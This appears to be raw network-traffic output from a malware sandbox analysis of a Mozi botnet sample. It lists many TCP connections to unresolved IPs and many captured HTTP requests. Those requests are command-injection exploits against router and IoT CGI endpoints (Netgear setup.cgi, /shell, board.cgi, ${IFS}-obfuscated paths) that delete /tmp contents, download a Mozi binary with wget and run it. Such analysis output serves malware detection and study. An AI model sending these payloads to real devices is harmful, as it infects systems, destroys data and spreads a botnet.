                            Source: unknownTCP traffic detected without corresponding DNS query: 117.116.60.186
                            Source: unknownTCP traffic detected without corresponding DNS query: 78.28.5.0
                            Source: unknownTCP traffic detected without corresponding DNS query: 169.253.87.242
                            Source: unknownTCP traffic detected without corresponding DNS query: 15.46.198.67
                            Source: unknownTCP traffic detected without corresponding DNS query: 95.133.117.213
                            Source: unknownTCP traffic detected without corresponding DNS query: 20.138.27.159
                            Source: unknownTCP traffic detected without corresponding DNS query: 144.192.196.181
                            Source: unknownTCP traffic detected without corresponding DNS query: 3.143.102.188
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.64.200.250
                            Source: unknownTCP traffic detected without corresponding DNS query: 79.205.134.177
                            Source: unknownTCP traffic detected without corresponding DNS query: 6.134.94.243
                            Source: unknownTCP traffic detected without corresponding DNS query: 1.85.100.98
                            Source: unknownTCP traffic detected without corresponding DNS query: 201.239.180.49
                            Source: unknownTCP traffic detected without corresponding DNS query: 129.224.247.20
                            Source: unknownTCP traffic detected without corresponding DNS query: 143.151.72.28
                            Source: unknownTCP traffic detected without corresponding DNS query: 98.35.241.78
                            Source: unknownTCP traffic detected without corresponding DNS query: 80.180.109.86
                            Source: unknownTCP traffic detected without corresponding DNS query: 65.224.103.49
                            Source: unknownTCP traffic detected without corresponding DNS query: 144.94.116.224
                            Source: unknownTCP traffic detected without corresponding DNS query: 146.136.103.163
                            Source: unknownTCP traffic detected without corresponding DNS query: 29.21.212.1
                            Source: unknownTCP traffic detected without corresponding DNS query: 104.212.159.134
                            Source: unknownTCP traffic detected without corresponding DNS query: 194.167.150.102
                            Source: unknownTCP traffic detected without corresponding DNS query: 164.194.135.238
                            Source: unknownTCP traffic detected without corresponding DNS query: 214.127.3.37
                            Source: unknownTCP traffic detected without corresponding DNS query: 24.51.61.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 71.82.199.131
                            Source: unknownTCP traffic detected without corresponding DNS query: 156.177.99.179
                            Source: unknownTCP traffic detected without corresponding DNS query: 129.222.135.49
                            Source: unknownTCP traffic detected without corresponding DNS query: 63.218.221.150
                            Source: unknownTCP traffic detected without corresponding DNS query: 152.156.223.170
                            Source: unknownTCP traffic detected without corresponding DNS query: 28.64.132.145
                            Source: unknownTCP traffic detected without corresponding DNS query: 174.112.238.150
                            Source: unknownTCP traffic detected without corresponding DNS query: 48.209.236.164
                            Source: unknownTCP traffic detected without corresponding DNS query: 122.219.76.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 100.40.238.158
                            Source: unknownTCP traffic detected without corresponding DNS query: 23.157.2.214
                            Source: unknownTCP traffic detected without corresponding DNS query: 142.225.53.129
                            Source: unknownTCP traffic detected without corresponding DNS query: 73.149.43.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 75.246.37.123
                            Source: unknownTCP traffic detected without corresponding DNS query: 195.102.149.63
                            Source: unknownTCP traffic detected without corresponding DNS query: 121.208.165.185
                            Source: unknownTCP traffic detected without corresponding DNS query: 159.226.179.189
                            Source: unknownTCP traffic detected without corresponding DNS query: 84.207.247.119
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 118.175.124.25:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 169.40.164.181:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 144.94.116.224:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 56.75.49.173:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 222.96.144.16:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 216.190.220.54:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 26.112.167.54:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 142.115.135.32:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 159.226.179.189:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 59.127.6.12:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 73.90.183.63:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 219.63.223.16:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 182.198.195.130:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
